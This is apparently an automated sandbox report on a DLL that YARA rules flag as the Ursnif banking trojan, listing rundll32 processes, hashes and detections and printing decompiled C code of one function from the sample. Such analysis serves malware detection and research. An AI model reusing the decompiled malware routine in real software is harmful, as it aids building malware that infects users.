                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 5680 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:08
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Preallable
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001D.00000002.380004706.00000000029F0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 4196 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:12
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Amphistomous
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000002.389489795.00000000029F0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 4868 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:15
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServer
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000021.00000002.520736013.0000000002DF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.417091528.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000002.530490300.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.416892582.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.416449935.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000021.00000002.512763307.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.417147272.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.416620379.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.417041948.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.416772424.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.416968580.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 580 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:19
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Americanistic
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000022.00000002.426506350.00000000007B0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: WerFault.exe PID: 6316 Parent PID: 6840

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:20
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 820
                                                                                                                                                                                                                                  Imagebase:0x260000
                                                                                                                                                                                                                                  File size:434592 bytes
                                                                                                                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 7044 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:23
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Suprahumanity
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000002.420794237.0000000002A00000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 6660 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:26
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Eupyrchroite
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000026.00000002.477089969.0000000000610000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: iexplore.exe PID: 3340 Parent PID: 2760

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:27
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17428 /prefetch:2
                                                                                                                                                                                                                                  Imagebase:0x12f0000
                                                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 6668 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:30
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Splitbeak
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000028.00000002.441408261.0000000002AD0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: WerFault.exe PID: 1020 Parent PID: 2736

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:31
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 816
                                                                                                                                                                                                                                  Imagebase:0x260000
                                                                                                                                                                                                                                  File size:434592 bytes
                                                                                                                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: iexplore.exe PID: 5784 Parent PID: 2760

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:32
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82974 /prefetch:2
                                                                                                                                                                                                                                  Imagebase:0x12f0000
                                                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 1744 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:35
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Andirin
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002B.00000002.464297747.00000000029F0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 7100 Parent PID: 5004

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:39
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Drail
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488543169.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488696812.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488440717.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002C.00000002.502483591.00000000029F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488723167.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488754897.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488667528.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002C.00000003.488635694.0000000006C68000.00000004.00000040.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                    Analysis Process: loaddll32.exe PID: 5004 Parent PID: 4040 loaddll32.exeCOMMON

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 02F912D4, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E02F912D4(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x2f9d278; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x2f9d238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x2f9d278; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x2f9d238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x2f9d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x2f9d278; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x2f9d27c; // 0x44a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x2f9e7f2; // 0x73797325
				_t83 = E02F995B1(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x2f9d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x2f9d27c; // 0x44a5a8
				_t16 = _t93 + 0x2f9e813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                                                                                                                                                                                                                    0x02f912dd
                                                                                                                                                                                                                                    0x02f912e3
                                                                                                                                                                                                                                    0x02f912e5
                                                                                                                                                                                                                                    0x02f912ff
                                                                                                                                                                                                                                    0x02f91303
                                                                                                                                                                                                                                    0x02f91306
                                                                                                                                                                                                                                    0x02f9157b
                                                                                                                                                                                                                                    0x02f91582
                                                                                                                                                                                                                                    0x02f91582
                                                                                                                                                                                                                                    0x02f9130c
                                                                                                                                                                                                                                    0x02f91321
                                                                                                                                                                                                                                    0x02f91323
                                                                                                                                                                                                                                    0x02f91327
                                                                                                                                                                                                                                    0x02f9132a
                                                                                                                                                                                                                                    0x02f9156b
                                                                                                                                                                                                                                    0x02f91575
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f91575
                                                                                                                                                                                                                                    0x02f91330
                                                                                                                                                                                                                                    0x02f9133b
                                                                                                                                                                                                                                    0x02f91340
                                                                                                                                                                                                                                    0x02f91345
                                                                                                                                                                                                                                    0x02f91348
                                                                                                                                                                                                                                    0x02f9134f
                                                                                                                                                                                                                                    0x02f91356
                                                                                                                                                                                                                                    0x02f91359
                                                                                                                                                                                                                                    0x02f9155b
                                                                                                                                                                                                                                    0x02f91565
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f91565
                                                                                                                                                                                                                                    0x02f9136f
                                                                                                                                                                                                                                    0x02f91373
                                                                                                                                                                                                                                    0x02f91376
                                                                                                                                                                                                                                    0x02f91379
                                                                                                                                                                                                                                    0x02f91381
                                                                                                                                                                                                                                    0x02f91384
                                                                                                                                                                                                                                    0x02f9138d
                                                                                                                                                                                                                                    0x02f91393
                                                                                                                                                                                                                                    0x02f9139d
                                                                                                                                                                                                                                    0x02f913a4
                                                                                                                                                                                                                                    0x02f913a4
                                                                                                                                                                                                                                    0x02f913b6
                                                                                                                                                                                                                                    0x02f913c1
                                                                                                                                                                                                                                    0x02f913cf
                                                                                                                                                                                                                                    0x02f913d4
                                                                                                                                                                                                                                    0x02f913d9
                                                                                                                                                                                                                                    0x02f913dc
                                                                                                                                                                                                                                    0x02f913e1
                                                                                                                                                                                                                                    0x02f913eb
                                                                                                                                                                                                                                    0x02f913ee
                                                                                                                                                                                                                                    0x02f913f1
                                                                                                                                                                                                                                    0x02f91407
                                                                                                                                                                                                                                    0x02f9140b
                                                                                                                                                                                                                                    0x02f9140e
                                                                                                                                                                                                                                    0x02f91559
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f91559
                                                                                                                                                                                                                                    0x02f91425
                                                                                                                                                                                                                                    0x02f91476
                                                                                                                                                                                                                                    0x02f91439
                                                                                                                                                                                                                                    0x02f91441
                                                                                                                                                                                                                                    0x02f91446
                                                                                                                                                                                                                                    0x02f91454
                                                                                                                                                                                                                                    0x02f9145d
                                                                                                                                                                                                                                    0x02f91466
                                                                                                                                                                                                                                    0x02f91466
                                                                                                                                                                                                                                    0x02f91474
                                                                                                                                                                                                                                    0x02f91474
                                                                                                                                                                                                                                    0x02f9147a
                                                                                                                                                                                                                                    0x02f9147e
                                                                                                                                                                                                                                    0x02f9147e
                                                                                                                                                                                                                                    0x02f91484
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f91486
                                                                                                                                                                                                                                    0x02f9148c
                                                                                                                                                                                                                                    0x02f91533
                                                                                                                                                                                                                                    0x02f91536
                                                                                                                                                                                                                                    0x02f91543
                                                                                                                                                                                                                                    0x02f91543
                                                                                                                                                                                                                                    0x02f91547
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9153c
                                                                                                                                                                                                                                    0x02f91540
                                                                                                                                                                                                                                    0x02f91540
                                                                                                                                                                                                                                    0x02f91542
                                                                                                                                                                                                                                    0x02f91542
                                                                                                                                                                                                                                    0x02f9154c
                                                                                                                                                                                                                                    0x02f91553
                                                                                                                                                                                                                                    0x02f91555
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f91555
                                                                                                                                                                                                                                    0x02f91492
                                                                                                                                                                                                                                    0x02f91494
                                                                                                                                                                                                                                    0x02f91494
                                                                                                                                                                                                                                    0x02f914a7
                                                                                                                                                                                                                                    0x02f914ad
                                                                                                                                                                                                                                    0x02f914b8
                                                                                                                                                                                                                                    0x02f914ba
                                                                                                                                                                                                                                    0x02f914be
                                                                                                                                                                                                                                    0x02f914c0
                                                                                                                                                                                                                                    0x02f914c0
                                                                                                                                                                                                                                    0x02f914c5
                                                                                                                                                                                                                                    0x02f914c7
                                                                                                                                                                                                                                    0x02f914c7
                                                                                                                                                                                                                                    0x02f914c5
                                                                                                                                                                                                                                    0x02f914cc
                                                                                                                                                                                                                                    0x02f914d0
                                                                                                                                                                                                                                    0x02f914d0
                                                                                                                                                                                                                                    0x02f914e0
                                                                                                                                                                                                                                    0x02f914e5
                                                                                                                                                                                                                                    0x02f914e8
                                                                                                                                                                                                                                    0x02f914e8
                                                                                                                                                                                                                                    0x02f914eb
                                                                                                                                                                                                                                    0x02f914f5
                                                                                                                                                                                                                                    0x02f914fd
                                                                                                                                                                                                                                    0x02f91502
                                                                                                                                                                                                                                    0x02f91510
                                                                                                                                                                                                                                    0x02f91510
                                                                                                                                                                                                                                    0x02f91524
                                                                                                                                                                                                                                    0x02f91528
                                                                                                                                                                                                                                    0x02f91528

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 02F912FF
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 02F91321
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F9133B
                                                                                                                                                                                                                                      • Part of subcall function 02F995B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,02F923E9,63699BCE,02F91354,73797325), ref: 02F995C2
                                                                                                                                                                                                                                      • Part of subcall function 02F995B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02F995DC
                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 02F91379
                                                                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02F9138D
                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02F913A4
                                                                                                                                                                                                                                    • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 02F913B0
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,642E2A5C), ref: 02F913F1
                                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,?), ref: 02F91407
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 02F91425
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(02F996C1,?), ref: 02F91439
                                                                                                                                                                                                                                    • FindClose.KERNEL32(02F996C1), ref: 02F91446
                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02F91452
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 02F91474
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,0000002E), ref: 02F914A7
